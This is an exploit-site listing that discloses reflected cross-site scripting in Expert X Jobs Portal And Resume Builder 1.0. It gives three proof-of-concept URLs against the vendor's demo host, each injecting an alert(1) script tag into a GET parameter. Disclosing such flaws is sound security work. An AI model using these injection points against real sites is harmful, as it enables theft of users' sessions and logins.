Exploit for Expert X Jobs Portal And Resume Builder 1.0 Cross Site Scripting

Name: Exploit for Expert X Jobs Portal And Resume Builder 1.0 Cross Site Scripting
Rating: 5 (66 reviews)
2023-06-12 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:172868
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : https://www.codester.com/items/36326/ │  
│ Vendor : wvidesk.com │  
│ Software : Expert X Jobs Portal And Resume Builder 1.0 │  
│ Vuln Type: Reflected XSS │  
│ Impact : Manipulate the content of the site │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ The attacker can send to victim a link containing a malicious URL in an email or │  
│ instant message can perform a wide variety of actions, such as stealing the victim's │  
│ session token or login credentials │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
Path: /companies  
  
GET parameter 'listed' is vulnerable to RXSS  
  
http://expert.wvidesk.com/companies?listed=z2rqw--><script>alert(1)</script>p8lvh  
  
  
Path: /search-field  
  
GET parameter 'pos_ref' is vulnerable to RXSS  
  
http://expert.wvidesk.com/search-field?pos_ref=qfq5c"><script>alert(1)</script>xosrj   
  
  
Path: /search-field  
  
GET parameter 'frmPositionCountry' is vulnerable to RXSS  
  
http://expert.wvidesk.com/search-field?pos_ref=it&frmPositionCountry=qfq5c"><script>alert(1)</script>xosrj&page=0  
  
  
  
[-] Done